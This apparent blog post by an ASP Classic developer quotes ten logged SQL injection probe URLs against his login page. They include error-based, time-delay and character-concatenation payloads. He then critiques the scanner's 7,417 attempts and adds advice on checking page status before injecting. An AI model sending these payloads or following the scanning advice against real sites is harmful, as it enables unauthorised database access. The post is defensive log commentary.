  110. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cdatabase%28%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%20"
  111. MyLoginPage.ASP?pgrt:convert%28int%2Cdb_name%28%29%29%20and%201%3D1"
  112. MyLoginPage.ASP?pgrt:convert%28int%2Cdb_name%28%29%29--"
  113. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A17%27--"
  114. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A17%27--"
  115. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20and%20if%281%3D1%2CBENCHMARK%2828712666%2CMD5%280x41%29%29%2C0%29"
  116. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%27%20and%20if%281%3D1%2CBENCHMARK%2828712666%2CMD5%280x41%29%29%2C0%29%20and%20%27x%27%3D%27x"
  117. MyLoginPage.ASP?pgrt:convert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29--"
  118. MyLoginPage.ASP?pgrt:convert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bCh"
  119. MyLoginPage.ASP?pgrt:convert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%"

 

Overall out of the 7,417 SQL attempts in just about 9 hours starting from 2015-03-26 05:33:58 to 2015-03-26 14:40:07 isn't smart. The other groups run 4 to 15 scans and move on. Why on earth would you want to risk being the "Search Bot" we all hate?

Don't scan more than you have to to see if you get any type of error. You're trolling for that 500 error and you should be reading the headers better. You would have noticed a few 301's and a couple of 404's in the mix. Some of the pages you have indexed having been online in over 2 years. So do a Page Hit 200 look up script before you send out the big guns to test the SQL Injection scripts. 

It's about planning and working smart. 

When I test, I know the coder, I read about him at XtremeComputer.Com and at MySmallCLoud.Com, it's important to know the coders that learned M_ and sp_ and those that learned MURRAY_ and NOOB_ because if it's not standard, if it's not corporate policy it's very difficult to break. 

Follow this link, you'll get a better idea of who I am. 

 ASP Classic Programming

You can also follow my XCtM Project or my Handyman Sites which all use the same code base. 

 

When you need to test your SQL Injection prevention scripts it's always nice finding someone online that has all the newest and oldest lines in the book. You can't bet log reports unless you get in and actually delete them. I appreciate the effort Mr. TVDW.EU did. I didn't check to see if it was an open proxy, but I hope it was. You should cut down on the scan attempts. I typically ignore those under 20. I look at those over 100 but I write about those that scan over 7,000 times.